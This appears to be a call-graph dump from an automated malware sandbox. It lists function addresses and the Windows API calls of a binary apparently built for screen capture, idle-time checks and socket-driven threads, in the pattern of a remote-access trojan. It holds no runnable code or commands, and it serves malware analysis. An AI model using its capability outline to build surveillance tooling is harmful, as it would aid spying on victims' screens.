404299 53755 402c48 22 API calls 53740->53755 53742->53732 53744 4027ef 53743->53744 53745 402851 53744->53745 53746 4027f9 53744->53746 53757 4028a4 22 API calls 53745->53757 53749 402802 53746->53749 53750 402815 53746->53750 53756 402aea 28 API calls __EH_prolog 53749->53756 53752 402813 53750->53752 53753 402252 11 API calls 53750->53753 53752->53732 53753->53752 53754->53740 53755->53742 53756->53752 53758->53591 53759->53596 53760->53598 53761 1000c7a7 53762 1000c7be 53761->53762 53767 1000c82c 53761->53767 53762->53767 53771 1000c7e6 GetModuleHandleA 53762->53771 53763 1000c872 53764 1000c835 GetModuleHandleA 53766 1000c83f 53764->53766 53766->53766 53766->53767 53767->53763 53767->53764 53772 1000c7ef 53771->53772 53778 1000c82c 53771->53778 53781 1000c803 53772->53781 53774 1000c872 53775 1000c835 GetModuleHandleA 53776 1000c83f 53775->53776 53776->53776 53776->53778 53778->53774 53778->53775 53782 1000c809 53781->53782 53783 1000c82c 53782->53783 53784 1000c80d VirtualProtect 53782->53784 53786 1000c872 53783->53786 53787 1000c835 GetModuleHandleA 53783->53787 53784->53783 53785 1000c81c VirtualProtect 53784->53785 53785->53783 53788 1000c83f 53787->53788 53788->53783 53789 43bea8 53790 43beb4 _swprintf ___scrt_is_nonwritable_in_current_image 53789->53790 53791 43bec2 53790->53791 53793 43beec 53790->53793 53805 44062d 20 API calls _Atexit 53791->53805 53800 445909 EnterCriticalSection 53793->53800 53795 43bec7 pre_c_initialization ___scrt_is_nonwritable_in_current_image 53796 43bef7 53801 43bf98 53796->53801 53800->53796 53803 43bfa6 53801->53803 53802 43bf02 53806 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 53802->53806 53803->53802 53807 4497ec 37 API calls 2 library calls 53803->53807 53805->53795 53806->53795 53807->53803 53808 4458c8 53809 4458d3 53808->53809 53811 4458fc 53809->53811 53813 4458f8 53809->53813 53814 448b04 53809->53814 53821 445920 DeleteCriticalSection 53811->53821 53822 44854a 53814->53822 53817 448b49 InitializeCriticalSectionAndSpinCount 53818 448b34 53817->53818 53829 43502b 53818->53829 53820 448b60 53820->53809 53821->53813 53823 448576 53822->53823 53824 44857a 53822->53824 53823->53824 53826 44859a 53823->53826 53836 4485e6 53823->53836 53824->53817 53824->53818 53826->53824 53827 4485a6 GetProcAddress 53826->53827 53828 4485b6 __crt_fast_encode_pointer 53827->53828 53828->53824 53830 435036 IsProcessorFeaturePresent 53829->53830 53831 435034 53829->53831 53833 435078 53830->53833 53831->53820 53843 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53833->53843 53835 43515b 53835->53820 53837 448607 LoadLibraryExW 53836->53837 53842 4485fc 53836->53842 53838 448624 GetLastError 53837->53838 53839 44863c 53837->53839 53838->53839 53840 44862f LoadLibraryExW 53838->53840 53841 448653 FreeLibrary 53839->53841 53839->53842 53840->53839 53841->53842 53842->53823 53843->53835 53844 418acd 53845 418af0 53844->53845 53846 418af8 SHCreateMemStream 53845->53846 53857 418691 GdipLoadImageFromStream 53846->53857 53848 418b0c 53858 4192c9 23 API calls _Yarn 53848->53858 53850 418b1a SHCreateMemStream 53859 418706 GdipSaveImageToStream 53850->53859 53852 418b62 53853 40520c 28 API calls 53852->53853 53854 418b7b 53853->53854 53861 4186b4 GdipDisposeImage 53854->53861 53856 418bbd 53857->53848 53858->53850 53860 418726 53859->53860 53860->53852 53861->53856 53862 41e04e 53863 41e063 ctype ___scrt_get_show_window_mode 53862->53863 53864 41e266 53863->53864 53881 432f55 21 API calls _Yarn 53863->53881 53870 41e21a 53864->53870 53876 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 53864->53876 53867 41e277 53867->53870 53877 432f55 21 API calls _Yarn 53867->53877 53869 41e213 ___scrt_get_show_window_mode 53869->53870 53882 432f55 21 API calls _Yarn 53869->53882 53872 41e2b0 ___scrt_get_show_window_mode 53872->53870 53878 4335db 53872->53878 53874 41e240 ___scrt_get_show_window_mode 53874->53870 53883 432f55 21 API calls _Yarn 53874->53883 53876->53867 53877->53872 53884 4334fa 53878->53884 53880 4335e3 53880->53870 53881->53869 53882->53874 53883->53864 53885 433513 53884->53885 53888 433509 53884->53888 53885->53888 53890 432f55 21 API calls _Yarn 53885->53890 53887 433534 53887->53888 53891 4338c8 CryptAcquireContextA 53887->53891 53888->53880 53890->53887 53892 4338e4 53891->53892 53893 4338e9 CryptGenRandom 53891->53893 53892->53888 53893->53892 53894 4338fe CryptReleaseContext 53893->53894 53894->53892 53895 426c6d 53901 426d42 recv 53895->53901 53902 4161ee 53903 401e65 22 API calls 53902->53903 53904 4161f9 53903->53904 53946 43bb2c 53904->53946 53907 401e65 22 API calls 53908 416214 53907->53908 53909 4020f6 28 API calls 53908->53909 53910 41621e 53909->53910 53911 416265 53910->53911 53912 416236 53910->53912 53914 401e65 22 API calls 53911->53914 53913 401e65 22 API calls 53912->53913 53915 41623b 53913->53915 53916 41626a 53914->53916 53917 4020f6 28 API calls 53915->53917 53918 4020f6 28 API calls 53916->53918 53919 416246 53917->53919 53920 416275 53918->53920 53922 4020f6 28 API calls 53919->53922 53921 4020f6 28 API calls 53920->53921 53923 416284 53921->53923 53924 416255 53922->53924 53925 4187aa 147 API calls 53923->53925 53950 4187aa 53924->53950 53927 416261 53925->53927 53928 401e65 22 API calls 53927->53928 53929 41629e 53928->53929 53930 43bb2c _strftime 40 API calls 53929->53930 53931 4162ab 53930->53931 53932 401e65 22 API calls 53931->53932 53933 4162c0 53932->53933 53934 43bb2c _strftime 40 API calls 53933->53934 53935 4162cd 53934->53935 54011 418977 102 API calls 53935->54011 53937 4162d6 53938 4170c4 53937->53938 53939 401fd8 11 API calls 53937->53939 53940 401e8d 11 API calls 53938->53940 53939->53938 53941 4170cd 53940->53941 53942 401fd8 11 API calls 53941->53942 53943 4170d9 53942->53943 53944 401fd8 11 API calls 53943->53944 53945 4170e5 53944->53945 53947 43bb45 _strftime 53946->53947 54012 43ae83 53947->54012 53949 416206 53949->53907 54082 401fc0 53950->54082 53953 401fc0 28 API calls 53954 4187db 53953->53954 53955 418800 ___scrt_get_show_window_mode 53954->53955 53956 4187f1 GdiplusStartup 53954->53956 54086 4194ff 53955->54086 53956->53955 53961 401f09 11 API calls 53962 41883e 53961->53962 53963 41884b 53962->53963 53964 404e26 99 API calls 53962->53964 54106 418e83 DeleteDC 53963->54106 53964->53963 53966 418850 53967 40482d 3 API calls 53966->53967 53968 418857 53967->53968 53969 41885b 53968->53969 53970 4048c8 97 API calls 53968->53970 53972 404e26 99 API calls 53969->53972 53971 418867 53970->53971 53971->53969 53974 418877 53971->53974 53973 418872 53972->53973 53977 401fd8 11 API calls 53973->53977 54107 404be5 CreateThread 53974->54107 53976 418881 53980 418899 53976->53980 53981 41891c 53976->53981 53978 41895f 53977->53978 53979 401fd8 11 API calls 53978->53979 53982 41896b 53979->53982 54108 41bd4f 28 API calls 53980->54108 53984 402f31 28 API calls 53981->53984 53982->53927 53986 418934 53984->53986 53985 4188a0 54109 41bc1f 53985->54109 53987 402f10 28 API calls 53986->53987 53989 41893e 53987->53989 53991 404aa1 61 API calls 53989->53991 54010 41891a 53991->54010 53992 402f31 28 API calls 53993 4188c8 53992->53993 53994 402ea1 28 API calls 53993->53994 53996 4188d4 53994->53996 53995 401fd8 11 API calls 53995->53973 53997 402f10 28 API calls 53996->53997 53998 4188e0 53997->53998 53999 402ea1 28 API calls 53998->53999 54000 4188ea 53999->54000 54001 404aa1 61 API calls 54000->54001 54002 4188f4 54001->54002 54003 401fd8 11 API calls 54002->54003 54004 4188ff 54003->54004 54005 401fd8 11 API calls 54004->54005 54006 418908 54005->54006 54007 401fd8 11 API calls 54006->54007 54008 418911 54007->54008 54009 401fd8 11 API calls 54008->54009 54009->54010 54010->53995 54011->53937 54028 43ba8a 54012->54028 54014 43aed0 54034 43a837 54014->54034 54015 43ae95 54015->54014 54016 43aeaa 54015->54016 54027 43aeaf pre_c_initialization 54015->54027 54033 44062d 20 API calls _Atexit 54016->54033 54020 43aedc 54021 43af0b 54020->54021 54042 43bacf 40 API calls __Tolower 54020->54042 54024 43af77 54021->54024 54043 43ba36 20 API calls 2 library calls 54021->54043 54044 43ba36 20 API calls 2 library calls 54024->54044 54025 43b03e _strftime 54025->54027 54045 44062d 20 API calls _Atexit 54025->54045 54027->53949 54029 43baa2 54028->54029 54030 43ba8f 54028->54030 54029->54015 54046 44062d 20 API calls _Atexit 54030->54046 54032 43ba94 pre_c_initialization 54032->54015 54033->54027 54035 43a854 54034->54035 54036 43a84a 54034->54036 54035->54036 54047 448295 GetLastError 54035->54047 54036->54020 54038 43a875 54068 4483e4 36 API calls __Getctype 54038->54068 54040 43a88e 54069 448411 36 API calls __cftoe 54040->54069 54042->54020 54043->54024 54044->54025 54045->54027 54046->54032 54048 4482b7 54047->54048 54049 4482ab 54047->54049 54071 445b74 20 API calls 3 library calls 54048->54071 54070 44883c 11 API calls 2 library calls 54049->54070 54052 4482b1 54052->54048 54054 448300 SetLastError 54052->54054 54053 4482c3 54055 4482cb 54053->54055 54078 448892 11 API calls 2 library calls 54053->54078 54054->54038 54072 446802 54055->54072 54057 4482e0 54057->54055 54060 4482e7 54057->54060 54059 4482d1 54061 44830c SetLastError 54059->54061 54079 448107 20 API calls _Atexit 54060->54079 54080 446175 36 API calls 4 library calls 54061->54080 54063 4482f2 54065 446802 _free 20 API calls 54063->54065 54067 4482f9 54065->54067 54066 448318 54067->54054 54067->54061 54068->54040 54069->54036 54070->54052 54071->54053 54073 44680d HeapFree 54072->54073 54074 446836 _free 54072->54074 54073->54074 54075 446822 54073->54075 54074->54059 54081 44062d 20 API calls _Atexit 54075->54081 54077 446828 GetLastError 54077->54074 54078->54057 54079->54063 54080->54066 54081->54077 54083 401fd2 54082->54083 54084 401fc9 54082->54084 54083->53953 54114 4025e0 28 API calls 54084->54114 54115 401f86 54086->54115 54089 4195f1 EnumDisplayDevicesW 54090 418828 54089->54090 54091 419542 EnumDisplayDevicesW 54089->54091 54097 401f13 54090->54097 54092 41956a 54091->54092 54092->54089 54093 40417e 28 API calls 54092->54093 54095 401f09 11 API calls 54092->54095 54096 4195be EnumDisplayDevicesW 54092->54096 54119 403014 54092->54119 54093->54092 54095->54092 54096->54092 54098 401f22 54097->54098 54105 401f6a 54097->54105 54099 402252 11 API calls 54098->54099 54100 401f2b 54099->54100 54101 401f6d 54100->54101 54102 401f46 54100->54102 54103 402336 11 API calls 54101->54103 54160 40305c 28 API calls 54102->54160 54103->54105 54105->53961 54106->53966 54107->53976 54161 404c01 54107->54161 54108->53985 54377 441ed1 54109->54377 54112 402093 28 API calls 54113 4188bb 54112->54113 54113->53992 54114->54083 54116 401f8e 54115->54116 54117 402252 11 API calls 54116->54117 54118 401f99 EnumDisplayMonitors 54117->54118 54118->54089 54124 403222 54119->54124 54121 403022 54128 403262 54121->54128 54125 40322e 54124->54125 54134 403618 54125->54134 54127 40323b 54127->54121 54129 40326e 54128->54129 54130 402252 11 API calls 54129->54130 54131 403288 54130->54131 54156 402336 54131->54156 54135 403626 54134->54135 54136 403644 54135->54136 54137 40362c 54135->54137 54138 40365c 54136->54138 54139 40369e 54136->54139 54145 4036a6 54137->54145 54141 403642 54138->54141 54143 4027e6 28 API calls 54138->54143 54154 4028a4 22 API calls 54139->54154 54141->54127 54143->54141 54146 402888 22 API calls 54145->54146 54147 4036b9 54146->54147 54148 40372c 54147->54148 54149 4036de 54147->54149 54155 4028a4 22 API calls 54148->54155 54152 4027e6 28 API calls 54149->54152 54153 4036f0 54149->54153 54152->54153 54153->54141 54157 402347 54156->54157 54158 402252 11 API calls 54157->54158 54159 4023c7 54158->54159 54159->54092 54160->54105 54164 404c10 54161->54164 54165 4020df 11 API calls 54164->54165 54166 404c27 54165->54166 54167 4020df 11 API calls 54166->54167 54170 404c30 54167->54170 54168 43bda0 _Yarn 21 API calls 54168->54170 54170->54168 54171 4020b7 28 API calls 54170->54171 54172 404ca1 54170->54172 54176 401fd8 11 API calls 54170->54176 54182 404b96 54170->54182 54188 401fe2 54170->54188 54197 404cc3 54170->54197 54171->54170 54174 404e26 99 API calls 54172->54174 54175 404ca8 54174->54175 54177 401fd8 11 API calls 54175->54177 54176->54170 54178 404cb1 54177->54178 54179 401fd8 11 API calls 54178->54179 54180 404c0f 54179->54180 54183 404ba0 WaitForSingleObject 54182->54183 54184 404bcd recv 54182->54184 54210 421107 54 API calls 54183->54210 54186 404be0 54184->54186 54186->54170 54187 404bbc SetEvent 54187->54186 54189 401ff1 54188->54189 54196 402039 54188->54196 54190 4023ce 11 API calls 54189->54190 54191 401ffa 54190->54191 54192 40203c 54191->54192 54193 402015 54191->54193 54194 40267a 11 API calls 54192->54194 54211 403098 28 API calls 54193->54211 54194->54196 54196->54170 54198 4020df 11 API calls 54197->54198 54208 404cde 54198->54208 54199 404e13 54200 401fd8 11 API calls 54199->54200 54201 404e1c 54200->54201 54201->54170 54202 4041a2 28 API calls 54202->54208 54203 401fe2 28 API calls 54203->54208 54204 401fd8 11 API calls 54204->54208 54205 4020f6 28 API calls 54205->54208 54206 401fc0 28 API calls 54207 404dad CreateEventA CreateThread WaitForSingleObject CloseHandle 54206->54207 54207->54208 54218 415b25 54207->54218 54208->54199 54208->54202 54208->54203 54208->54204 54208->54205 54208->54206 54212 40423a 54208->54212 54210->54187 54211->54196 54213 404243 54212->54213 54214 4023ce 11 API calls 54213->54214 54215 40424e 54214->54215 54216 402569 28 API calls 54215->54216 54217 404261 54216->54217 54217->54208 54219 4020f6 28 API calls 54218->54219 54220 415b47 SetEvent 54219->54220 54221 415b5c 54220->54221 54297 4041a2 54221->54297 54224 4020f6 28 API calls 54225 415b86 54224->54225 54226 4020f6 28 API calls 54225->54226 54227 415b98 54226->54227 54300 41beac 54227->54300 54230 415bc1 GetTickCount 54233 41bc1f 28 API calls 54230->54233 54231 415d20 54294 415d34 54231->54294 54296 415d11 54231->54296 54232 401e8d 11 API calls 54234 4170cd 54232->54234 54235 415bd2 54233->54235 54237 401fd8 11 API calls 54234->54237 54322 41bb77 GetLastInputInfo GetTickCount 54235->54322 54239 4170d9 54237->54239 54241 401fd8 11 API calls 54239->54241 54240 415bde 54243 41bc1f 28 API calls 54240->54243 54242 4170e5 54241->54242 54244 415be9 54243->54244 54245 41bb27 30 API calls 54244->54245 54246 415bf7 54245->54246 54247 41bdaf 28 API calls 54246->54247 54248 415c05 54247->54248 54249 401e65 22 API calls 54248->54249 54250 415c13 54249->54250 54251 402f31 28 API calls 54250->54251 54252 415c21 54251->54252 54253 402ea1 28 API calls 54252->54253 54254 415c30 54253->54254 54255 402f10 28 API calls 54254->54255 54256 415c3f 54255->54256 54257 402ea1 28 API calls 54256->54257 54258 415c4e 54257->54258 54259 402f10 28 API calls 54258->54259 54260 415c5a 54259->54260 54261 402ea1 28 API calls 54260->54261 54262 415c64 54261->54262 54263 404aa1 61 API calls 54262->54263 54264 415c73 54263->54264 54265 401fd8 11 API calls 54264->54265 54266 415c7c 54265->54266 54267 401fd8 11 API calls 54266->54267 54268 415c88 54267->54268 54269 401fd8 11 API calls 54268->54269 54270 415c94 54269->54270 54271 401fd8 11 API calls 54270->54271 54272 415ca0 54271->54272 54273 401fd8 11 API calls 54272->54273 54274 415cac 54273->54274 54275 401fd8 11 API calls 54274->54275 54276 415cb8 54275->54276 54277 401f09 11 API calls 54276->54277 54278 415cc1 54277->54278 54279 401fd8 11 API calls 54278->54279 54280 415cca 54279->54280 54281 401fd8 11 API calls 54280->54281 54282 415cd3 54281->54282 54283 401e65 22 API calls 54282->54283 54284 415cde 54283->54284 54285 43bb2c _strftime 40 API calls 54284->54285 54286 415ceb 54285->54286 54287 415cf0 54286->54287 54288 415d16 54286->54288 54290 415d09 54287->54290 54291 415cfe 54287->54291 54289 401e65 22 API calls 54288->54289 54289->54231 54324 404f51 54290->54324 54323 404ff4 82 API calls 54291->54323 54339 4050e4 84 API calls 54294->54339 54295 415d04 54295->54296 54296->54232 54298 40423a 28 API calls 54297->54298 54299 4041b5 54298->54299 54299->54224 54301 4020df 11 API calls 54300->54301 54321 41bebf 54301->54321 54302 41bf2f 54303 401fd8 11 API calls 54302->54303 54304 41bf61 54303->54304 54305 401fd8 11 API calls 54304->54305 54307 41bf69 54305->54307 54306 41bf31 54308 4041a2 28 API calls 54306->54308 54310 401fd8 11 API calls 54307->54310 54311 41bf3d 54308->54311 54309 4041a2 28 API calls 54309->54321 54312 415ba1 54310->54312 54313 401fe2 28 API calls 54311->54313 54312->54230 54312->54231 54312->54296 54315 41bf46 54313->54315 54314 401fe2 28 API calls 54314->54321 54317 401fd8 11 API calls 54315->54317 54316 401fd8 11 API calls 54316->54321 54318 41bf4e 54317->54318 54319 41cec5 28 API calls 54318->54319 54319->54302 54321->54302 54321->54306 54321->54309 54321->54314 54321->54316 54340 41cec5 54321->54340 54322->54240 54323->54295 54325 404f65 54324->54325 54326 404fea 54324->54326 54327 404f6e 54325->54327 54328 404fc0 CreateEventA CreateThread 54325->54328 54329 404f7d GetLocalTime 54325->54329 54326->54296 54327->54328 54328->54326 54373 405150 54328->54373 54330 41bc1f 28 API calls 54329->54330 54331 404f91 54330->54331 54372 4052fd 28 API calls 54331->54372 54339->54295 54341 41ced2 54340->54341 54342 41cf31 54341->54342 54346 41cee2 54341->54346 54343 41cf4b 54342->54343 54344 41d071 28 API calls 54342->54344 54360 41d1d7 28 API calls 54343->54360 54344->54343 54348 41cf1a 54346->54348 54351 41d071 54346->54351 54359 41d1d7 28 API calls 54348->54359 54350 41cf2d 54350->54321 54353 41d079 54351->54353 54352 41d0ab 54352->54348 54353->54352 54354 41d0af 54353->54354 54357 41d093 54353->54357 54371 402725 22 API calls 54354->54371 54361 41d0e2 54357->54361 54359->54350 54360->54350 54362 41d0ec __EH_prolog 54361->54362 54363 402717 22 API calls 54362->54363 54364 41d0ff 54363->54364 54365 41d1ee 11 API calls 54364->54365 54366 41d125 54365->54366 54367 41d15d 54366->54367 54368 402730 11 API calls 54366->54368 54367->54352 54369 41d144 54368->54369 54370 402712 11 API calls 54369->54370 54370->54367 54376 40515c 102 API calls 54373->54376 54375 405159 54376->54375 54378 441edd 54377->54378 54381 441ccd 54378->54381 54380 41bc43 54380->54112 54382 441ce4 54381->54382 54384 441d1b pre_c_initialization 54382->54384 54385 44062d 20 API calls _Atexit 54382->54385 54384->54380 54385->54384 54386 418eb1 CreateDCA CreateCompatibleDC 54435 419360 54386->54435 54388 418eec 54390 418f13 54388->54390 54440 4193a2 GetMonitorInfoW 54388->54440 54391 418f71 54390->54391 54438 4193d8 GetMonitorInfoW 54390->54438 54392 402093 28 API calls 54391->54392 54434 418f7d 54392->54434 54395 418f8a SelectObject 54398 418fa5 StretchBlt 54395->54398 54399 418f96 DeleteDC DeleteDC 54395->54399 54396 418f5e DeleteDC DeleteDC 54397 418f6b DeleteObject 54396->54397 54397->54391 54398->54399 54400 418fce 54398->54400 54399->54397 54402 418fd5 GetCursorInfo 54400->54402 54403 41904f 54400->54403 54402->54403 54404 418fec GetIconInfo 54402->54404 54405 419099 GetObjectA 54403->54405 54407 419062 BitBlt 54403->54407 54408 419089 54403->54408 54404->54403 54406 419002 DeleteObject DeleteObject DrawIcon 54404->54406 54405->54399 54410 4190b1 LocalAlloc 54405->54410 54406->54403 54407->54405 54408->54405 54411 419154 GlobalAlloc 54410->54411 54412 41914a 54410->54412 54411->54399 54413 419196 GetDIBits 54411->54413 54412->54411 54414 4191d3 54413->54414 54415 4191ad DeleteDC DeleteDC DeleteObject GlobalFree 54413->54415 54416 4020df 11 API calls 54414->54416 54415->54391 54417 41920f 54416->54417 54418 4020df 11 API calls 54417->54418 54419 41921b 54418->54419 54420 40250a 28 API calls 54419->54420 54421 41922b 54420->54421 54422 40250a 28 API calls 54421->54422 54423 419248 54422->54423 54424 40250a 28 API calls 54423->54424 54425 41926a 54424->54425 54426 41927b DeleteObject GlobalFree DeleteDC 54425->54426 54427 4192a0 54426->54427 54428 41929d DeleteDC 54426->54428 54429 402055 11 API calls 54427->54429 54428->54427 54430 4192af 54429->54430 54431 401fd8 11 API calls 54430->54431 54432 4192bb 54431->54432 54433 401fd8 11 API calls 54432->54433 54433->54434 54436 436f10 ___scrt_get_show_window_mode 54435->54436 54437 41937e EnumDisplaySettingsW 54436->54437 54437->54388 54439 418f48 CreateCompatibleBitmap 54438->54439 54439->54395 54439->54396 54440->54390 54441 426a77 54442 426a8c 54441->54442 54454 426b1e 54441->54454 54443 426b83 54442->54443 54444 426bae 54442->54444 54447 426b0e 54442->54447 54451 426b4e 54442->54451 54453 426ad9 54442->54453 54442->54454 54455 426bd5 54442->54455 54469 424f6e 49 API calls ctype 54442->54469 54443->54444 54473 425781 21 API calls 54443->54473 54444->54454 54444->54455 54457 425b72 54444->54457 54447->54451 54447->54454 54471 424f6e 49 API calls ctype 54447->54471 54451->54443 54451->54454 54472 41fbfd 52 API calls 54451->54472 54453->54447 54453->54454 54470 41fbfd 52 API calls 54453->54470 54455->54454 54474 4261e6 28 API calls 54455->54474 54458 425b91 ___scrt_get_show_window_mode 54457->54458 54460 425ba0 54458->54460 54464 425bc5 54458->54464 54475 41ec4c 21 API calls 54458->54475 54460->54464 54468 425ba5 54460->54468 54476 420669 46 API calls 54460->54476 54463 425bae 54463->54464 54479 424d96 21 API calls 2 library calls 54463->54479 54464->54455 54466 425c48 54466->54464 54477 432f55 21 API calls _Yarn 54466->54477 54468->54463 54468->54464 54478 41daf0 49 API calls 54468->54478 54469->54453 54470->54453 54471->54451 54472->54451 54473->54444 54474->54454 54475->54460 54476->54466 54477->54468 54478->54463 54479->54464 54480 4165db 54481 401e65 22 API calls 54480->54481 54482 4165eb 54481->54482 54483 4020f6 28 API calls 54482->54483 54484 4165f6 54483->54484 54485 401e65 22 API calls 54484->54485 54486 416601 54485->54486 54487 4020f6 28 API calls 54486->54487 54488 41660c 54487->54488 54491 412965 54488->54491 54492 40482d 3 API calls 54491->54492 54493 412979 54492->54493 54494 4048c8 97 API calls 54493->54494 54495 412981 54494->54495 54496 402f31 28 API calls 54495->54496 54497 41299a 54496->54497 54498 402f10 28 API calls 54497->54498 54499 4129a4 54498->54499 54500 404aa1 61 API calls 54499->54500 54501 4129ae 54500->54501 54502 401fd8 11 API calls 54501->54502 54503 4129b6 54502->54503 54504 404c10 130 API calls 54503->54504 54505 4129c4 54504->54505 54506 401fd8 11 API calls 54505->54506 54507 4129cc 54506->54507 54508 401fd8 11 API calls 54507->54508 54509 4129d4 54508->54509 54510 44839e 54518 448790 54510->54518 54514 4483c7 54515 4483ba 54515->54514 54526 4483ca 11 API calls 54515->54526 54517 4483b2 54519 44854a _Atexit 5 API calls 54518->54519 54520 4487b7 54519->54520 54521 4487cf TlsAlloc 54520->54521 54522 4487c0 54520->54522 54521->54522 54523 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54522->54523 54524 4483a8 54523->54524 54524->54517 54525 448319 20 API calls 3 library calls 54524->54525 54525->54515 54526->54517 54527 100020db 54530 100020e7 ___DestructExceptionObject 54527->54530 54528 100020f6 54529 10002110 dllmain_raw 54529->54528 54531 1000212a 54529->54531 54530->54528 54530->54529 54536 1000210b 54530->54536 54540 10001eec 54531->54540 54533 10002177 54533->54528 54534 10001eec 29 API calls 54533->54534 54535 1000218a 54534->54535 54535->54528 54538 10002193 dllmain_raw 54535->54538 54536->54528 54536->54533 54537 10001eec 29 API calls 54536->54537 54539 1000216d dllmain_raw 54537->54539 54538->54528 54539->54533 54541 10001ef7 54540->54541 54542 10001f2a dllmain_crt_process_detach 54540->54542 54543 10001f1c dllmain_crt_process_attach 54541->54543 54544 10001efc 54541->54544 54549 10001f06 54542->54549 54543->54549 54545 10001f01 54544->54545 54546 10001f12 54544->54546 54545->54549 54550 1000240b 25 API calls 54545->54550 54551 100023ec 27 API calls 54546->54551 54549->54536 54550->54549 54551->54549 54552 434918 54553 434924 ___scrt_is_nonwritable_in_current_image 54552->54553 54579 434627 54553->54579 54555 43492b 54557 434954 54555->54557 54885 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 54555->54885 54566 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 54557->54566 54590 4442d2 54557->54590 54561 434973 ___scrt_is_nonwritable_in_current_image 54562 4349f3 54598 434ba5 54562->54598 54566->54562 54886 443487 36 API calls 4 library calls 54566->54886 54580 434630 54579->54580 54891 434cb6 IsProcessorFeaturePresent 54580->54891 54582 43463c 54892 438fb1 54582->54892 54584 434641 54585 434645 54584->54585 54901 44415f 54584->54901 54585->54555 54588 43465c 54588->54555 54592 4442e9 54590->54592 54591 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54593 43496d 54591->54593 54592->54591 54593->54561 54594 444276 54593->54594 54595 4442a5 54594->54595 54596 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54595->54596 54597 4442ce 54596->54597 54597->54566 54599 436f10 ___scrt_get_show_window_mode 54598->54599 54600 434bb8 GetStartupInfoW 54599->54600 54601 4349f9 54600->54601 54602 444223 54601->54602 54951 44f0d9 54602->54951 54604 44422c 54606 434a02 54604->54606 54955 446895 36 API calls 54604->54955 54607 40ea00 54606->54607 55085 41cbe1 LoadLibraryA GetProcAddress 54607->55085 54609 40ea1c GetModuleFileNameW 55090 40f3fe 54609->55090 54611 40ea38 54612 4020f6 28 API calls 54611->54612 54613 40ea47 54612->54613 54614 4020f6 28 API calls 54613->54614 54615 40ea56 54614->54615 54616 41beac 28 API calls 54615->54616 54617 40ea5f 54616->54617 55105 40fb52 54617->55105 54619 40ea68 54620 401e8d 11 API calls 54619->54620 54621 40ea71 54620->54621 54622 40ea84 54621->54622 54623 40eace 54621->54623 55290 40fbee 118 API calls 54622->55290 54625 401e65 22 API calls 54623->54625 54627 40eade 54625->54627 54626 40ea96 54628 401e65 22 API calls 54626->54628 54630 401e65 22 API calls 54627->54630 54629 40eaa2 54628->54629 55291 410f72 36 API calls __EH_prolog 54629->55291 54631 40eafd 54630->54631 54632 40531e 28 API calls 54631->54632 54634 40eb0c 54632->54634 54636 406383 28 API calls 54634->54636 54635 40eab4 55292 40fb9f 78 API calls 54635->55292 54638 40eb18 54636->54638 54640 401fe2 28 API calls 54638->54640 54639 40eabd 55293 40f3eb 71 API calls 54639->55293 54642 40eb24 54640->54642 54643 401fd8 11 API calls 54642->54643 54644 40eb2d 54643->54644 54646 401fd8 11 API calls 54644->54646 54648 40eb36 54646->54648 54649 401e65 22 API calls 54648->54649 54650 40eb3f 54649->54650 54651 401fc0 28 API calls 54650->54651 54652 40eb4a 54651->54652 54653 401e65 22 API calls 54652->54653 54654 40eb63 54653->54654 54655 401e65 22 API calls 54654->54655 54656 40eb7e 54655->54656 54657 40ebe9 54656->54657 55294 406c59 54656->55294 54658 401e65 22 API calls 54657->54658 54664 40ebf6 54658->54664 54660 40ebab 54661 401fe2 28 API calls 54660->54661 54662 40ebb7 54661->54662 54663 401fd8 11 API calls 54662->54663 54666 40ebc0 54663->54666 54665 40ec3d 54664->54665 54670 413584 3 API calls 54664->54670 55109 40d0a4 54665->55109 55299 413584 RegOpenKeyExA 54666->55299 54676 40ec21 54670->54676 54674 40f38a 55392 4139e4 30 API calls 54674->55392 54676->54665 55302 4139e4 30 API calls 54676->55302 54684 40f3a0 55393 4124b0 65 API calls ___scrt_get_show_window_mode 54684->55393 54885->54555 54886->54562 54891->54582 54893 438fb6 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 54892->54893 54905 43a4ba 54893->54905 54896 438fc4 54896->54584 54898 438fcc 54899 438fd7 54898->54899 54919 43a4f6 DeleteCriticalSection 54898->54919 54899->54584 54947 44fbe8 54901->54947 54904 438fda 8 API calls 3 library calls 54904->54585 54906 43a4c3 54905->54906 54908 43a4ec 54906->54908 54910 438fc0 54906->54910 54920 438eff 54906->54920 54925 43a4f6 DeleteCriticalSection 54908->54925 54910->54896 54911 43a46c 54910->54911 54940 438e14 54911->54940 54913 43a476 54914 43a481 54913->54914 54945 438ec2 6 API calls try_get_function 54913->54945 54914->54898 54916 43a48f 54917 43a49c 54916->54917 54946 43a49f 6 API calls ___vcrt_FlsFree 54916->54946 54917->54898 54919->54896 54926 438cf3 54920->54926 54923 438f36 InitializeCriticalSectionAndSpinCount 54924 438f22 54923->54924 54924->54906 54925->54910 54927 438d23 54926->54927 54928 438d27 54926->54928 54927->54928 54929 438d47 54927->54929 54933 438d93 54927->54933 54928->54923 54928->54924 54929->54928 54931 438d53 GetProcAddress 54929->54931 54932 438d63 __crt_fast_encode_pointer 54931->54932 54932->54928 54934 438dbb LoadLibraryExW 54933->54934 54939 438db0 54933->54939 54935 438dd7 GetLastError 54934->54935 54936 438def 54934->54936 54935->54936 54937 438de2 LoadLibraryExW 54935->54937 54938 438e06 FreeLibrary 54936->54938 54936->54939 54937->54936 54938->54939 54939->54927 54941 438cf3 try_get_function 5 API calls 54940->54941 54942 438e2e 54941->54942 54943 438e46 TlsAlloc 54942->54943 54944 438e37 54942->54944 54944->54913 54945->54916 54946->54914 54950 44fc01 54947->54950 54948 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54949 43464e 54948->54949 54949->54588 54949->54904 54950->54948 54952 44f0e2 54951->54952 54954 44f0eb 54951->54954 54956 44efd8 54952->54956 54954->54604 54955->54604 54957 448295 _Atexit 36 API calls 54956->54957 54958 44efe5 54957->54958 54976 44f0f7 54958->54976 54960 44efed 54985 44ed6c 